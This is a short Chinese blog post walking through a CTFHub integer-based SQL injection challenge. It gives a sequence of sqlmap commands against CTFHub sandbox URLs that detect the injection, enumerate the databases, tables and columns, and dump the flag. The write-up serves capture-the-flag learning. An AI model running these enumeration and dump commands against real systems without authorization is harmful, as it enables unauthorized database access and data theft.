CTFHUB WEB-SQL注入-整数型注入

1.题目

2.使用的环境及工具

环境：kail linux

工具：sqlmap

3.操作步骤

本题是基于sql的注入，首先考虑sqlmap，先查看这个sql是否存在注入

~~~sqlmap -u http://challenge-feaee1d753e60318.sandbox.ctfhub.com:10800/?id=1

检查一下全部数据库内容

sqlmap -u http://challenge-feaee1d753e60318.sandbox.ctfhub.com:10800/?id=1 --dbs

返回值有四个，但是除了sqli，其他都是配置，所以重点在sqli上

sqlmap -u http://challenge-a7369d59e66383b7.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables

发现表了之后访问sqli的所有列

sqlmap -u http://challenge-a7369d59e66383b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns

最后读取flag的值

sqlmap -u http://challenge-a7369d59e66383b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump

posted @ 2022-10-22 11:33 WuliweiT 阅读(71) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· CTF web笔记

· sqlmap的使用方法（linux）

· CTFHub——技能树——SQL注入（sqlmap）

· CTFHUB 技能树 SQL 10

· CTFHUB---SQL注入

阅读排行：
· Manus爆火，是硬核还是营销？
· 终于写完轮子一部分：tcp代理了，记录一下
· 震惊！C++程序真的从main开始吗？99%的程序员都答错了
· 别再用vector＜bool＞了！Google高级工程师：这可能是STL最大的设计失误
· 单元测试从入门到精通

昵称： WuliweiT
园龄： 4年1个月
粉丝： 3
关注： 1

2025年3月

日

一

二

三

四

五

六

WuliweiT